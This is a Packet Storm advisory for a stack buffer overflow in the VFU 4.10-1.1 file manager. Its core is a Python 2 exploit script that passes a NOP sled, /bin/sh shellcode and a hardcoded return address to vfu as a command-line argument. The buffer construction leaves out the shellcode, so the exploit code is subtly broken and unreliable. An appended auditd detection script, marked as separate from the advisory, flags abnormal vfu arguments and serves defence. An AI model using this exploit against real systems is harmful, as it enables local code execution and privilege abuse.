VFU 4.10-1.1 Stack Buffer Overflow

2014-03-23T00:00:00
ID PACKETSTORM:125831
Type packetstorm
Reporter Provensec
Modified 2014-03-23T00:00:00

Description

```python
# Author: Provensec http://www.provensec.com <advisories@provensec.com>
# Tested on GNU/Linux - Debian Wheezy

# Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker can exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Application vendor: VFU v4.10-1.1 ( Latest ) - http://cade.datamax.bg/vfu/
# Download from: https://packages.debian.org/wheezy/vfu

# Python 2 script (uses print statements).
import errno
import subprocess

buffersize = 803
nopsled = "\x90"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x10\xf0\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip

# The oversized string is passed to vfu as its first command-line argument.
try:
    subprocess.call(["vfu", buffer])
except OSError as e:
    # ENOENT means the vfu binary is not on PATH.
    if e.errno == errno.ENOENT:
        print "VFU not found!"
    else:
        print "Error executing exploit"
        raise
```
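A detection-side companion to the advisory, added here and not part of the Provensec advisory or of VFU: it scans auditd `EXECVE` records for `vfu` invocations whose argument is overlong or carries non-printable bytes, which is how the overflow input above reaches the program. The sample records are constructed, and the 512-byte limit, the function names and the presence of an execve audit rule are assumptions.

```python
import re

MAX_ARG_LEN = 512  # assumed limit; tune to the longest path users really pass to vfu

EXECVE = re.compile(r'^type=EXECVE msg=audit\((?P<id>[^)]+)\): argc=\d+ (?P<args>.*)$')
ARG = re.compile(r'a(\d+)=("[^"]*"|[0-9A-Fa-f]+)')

# Constructed sample records (not taken from a real host).
SAMPLE = [
    'type=EXECVE msg=audit(1395532800.101:41): argc=2 a0="vfu" a1="/home/user/docs"',
    'type=EXECVE msg=audit(1395532800.202:42): argc=2 a0="vfu" a1=' + '90' * 800,
    'type=EXECVE msg=audit(1395532800.303:43): argc=2 a0="ls" a1="-la"',
]

def decode_arg(raw):
    """Return (value_bytes, was_hex). auditd quotes plain args and hex-encodes the rest."""
    if raw.startswith('"'):
        return raw[1:-1].encode(), False
    try:
        return bytes.fromhex(raw), True
    except ValueError:  # odd-length run of hex digits: treat it as a literal
        return raw.encode(), False

def suspicious_vfu_execs(lines, max_len=MAX_ARG_LEN):
    """Return (audit_id, arg_index, reasons) for every vfu argument that looks abnormal."""
    findings = []
    for line in lines:
        m = EXECVE.match(line.strip())
        if not m:
            continue
        args = [decode_arg(raw) for _, raw in ARG.findall(m.group('args'))]
        # a0 is argv[0]; compare its basename so /usr/bin/vfu matches as well.
        if not args or args[0][0].rsplit(b'/', 1)[-1] != b'vfu':
            continue
        for idx, (value, was_hex) in enumerate(args[1:], start=1):
            reasons = []
            if len(value) > max_len:
                reasons.append('length %d > %d' % (len(value), max_len))
            if was_hex and any(b < 0x20 or b > 0x7e for b in value):
                reasons.append('non-printable bytes')
            if reasons:
                findings.append((m.group('id'), idx, reasons))
    return findings

if __name__ == '__main__':
    for audit_id, idx, reasons in suspicious_vfu_execs(SAMPLE):
        print('%s a%d: %s' % (audit_id, idx, ', '.join(reasons)))
```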